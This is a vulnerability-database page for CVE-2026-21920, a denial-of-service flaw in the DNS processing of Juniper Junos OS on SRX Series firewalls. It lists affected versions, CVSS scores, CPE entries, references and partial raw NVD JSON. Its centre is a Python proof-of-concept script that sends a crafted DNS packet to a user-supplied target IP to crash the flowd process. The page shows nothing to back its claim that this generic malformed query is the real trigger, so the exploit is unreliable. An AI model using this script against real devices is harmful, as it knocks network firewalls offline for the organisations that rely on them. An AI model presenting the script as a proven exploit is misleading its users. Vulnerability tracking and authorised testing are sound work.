CVE-2026-21920

Description

An Unchecked Return Value vulnerability in the DNS module of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). If an SRX Series device configured for DNS processing, receives a specifically formatted DNS request flowd will crash and restart, which causes a service interruption until the process has recovered. This issue affects Junos OS on SRX Series: * 23.4 versions before 23.4R2-S5, * 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R2. This issue does not affect Junos OS versions before 23.4R1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:23.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:23.4:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:23.4:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:23.4:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:23.4:r2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx320:-:*:*:*:*:*:*:* - NOT VULNERABLE

Junos OS 23.4 < 23.4R2-S5

Junos OS 24.2 < 24.2R2-S1

Junos OS 24.4 < 24.4R2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-21920 PoC - Juniper Junos OS DNS Module DoS
# Target: Juniper SRX Series devices with DNS processing enabled
# This PoC sends a malformed DNS request to trigger the unchecked return value vulnerability

import socket
import struct
import random
import sys

def create_malformed_dns_request():
    """Create a malformed DNS request that triggers the vulnerability"""
    # DNS Header
    transaction_id = random.randint(0, 65535)
    flags = 0x0100  # Standard query
    questions = 1
    answer_rrs = 0
    authority_rrs = 0
    additional_rrs = 0
    
    dns_header = struct.pack('>HHHHHH',
        transaction_id,
        flags,
        questions,
        answer_rrs,
        authority_rrs,
        additional_rrs
    )
    
    # Malformed DNS query - using specific domain pattern
    # The vulnerability is triggered by specific DNS request format
    domain = b'\xc0\x0c'  # Compression pointer to trigger parsing issue
    qtype = struct.pack('>H', 1)  # Type A
    qclass = struct.pack('>H', 1)  # Class IN
    
    dns_query = dns_header + domain + qtype + qclass
    
    return dns_query

def send_dns_exploit(target_ip, target_port=53):
    """Send the exploit DNS request to target"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        
        payload = create_malformed_dns_request()
        print(f"[*] Sending malformed DNS request to {target_ip}:{target_port}")
        print(f"[*] Payload length: {len(payload)} bytes")
        
        sock.sendto(payload, (target_ip, target_port))
        print("[+] Malformed DNS request sent successfully")
        print("[!] Target flowd process should crash and restart")
        
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2026-21920.py <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 53
    
    print("=" * 60)
    print("CVE-2026-21920 - Juniper Junos OS DNS Module DoS PoC")
    print("=" * 60)
    
    send_dns_exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21920
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21920
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21920/
[4] VulDB https://vuldb.com/cve/CVE-2026-21920
[5] https://kb.juniper.net/JSA106020
[6] https://supportportal.juniper.net/JSA106020

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21920", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:08.217", "lastModified": "2026-01-23T18:51:59.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Unchecked Return Value vulnerability in the DNS module of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS).\n\n\n\n\nIf an SRX Series device configured for DNS processing, receives a specifically formatted DNS request flowd will crash and restart, which causes a service interruption until the process has recovered.\n\nThis issue affects Junos OS on SRX Series:\n\n\n\n * 23.4 versions before 23.4R2-S5,\n * 24.2 versions before 24.2R2-S1,\n * 24.4 versions before 24.4R2.\n\n\n\n\n\n\nThis issue does not affect Junos OS versions before 23.4R1."}, {"lang": "es", "value": "Una vulnerabilidad de valor de retorno no verificado en el módulo DNS de Juniper Networks Junos OS en la serie SRX permite a un atacante no autenticado y basado en la red causar una denegación de servicio (DoS).\n\nSi un dispositivo de la serie SRX configurado para el procesamiento de DNS recibe una solicitud DNS específicamente formateada, flowd se bloqueará y reiniciará, lo que causa una interrupción del servicio hasta que el proceso se haya recuperado.\n\nEste problema afecta a Junos OS en la serie SRX:\n\n * versiones 23.4 anteriores a 23.4R2-S5,\n * versiones 24.2 anteriores a 24.2R2-S1,\n * versiones 24.4 anteriores a 24.4R2.\n\nEste problema no afecta a las versiones de Junos OS anteriores a 23.4R1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-252"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:-:*:*:*:*:*:*", "matchCriteriaId": "78481ABC-3620-410D-BC78-334657E0BB75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r1:*:*:*:*:*:*", "matchCriteriaId": "BE8A5BA3-87BD-473A-B229-2AAB2C797005"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "8B74AC3E-8FC9-400A-A176-4F7F21F10756"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "CB2D1FCE-8019-4CE1-BA45-D62F91AF7B51"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2:*:*:*:*:*:*", "matchCriteriaId": "175CCB13-76C0-44A4-A71D-41E22B92EB23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "166BFDB3-1945-4949-BC2B-E18442FF2E4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "5923610F-878C-48CA-8B5D-9C609E4DD4DB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "A7C207E3-0252-4192-8E8C-E2ED2831B4F4"}, {"vul ... (truncated)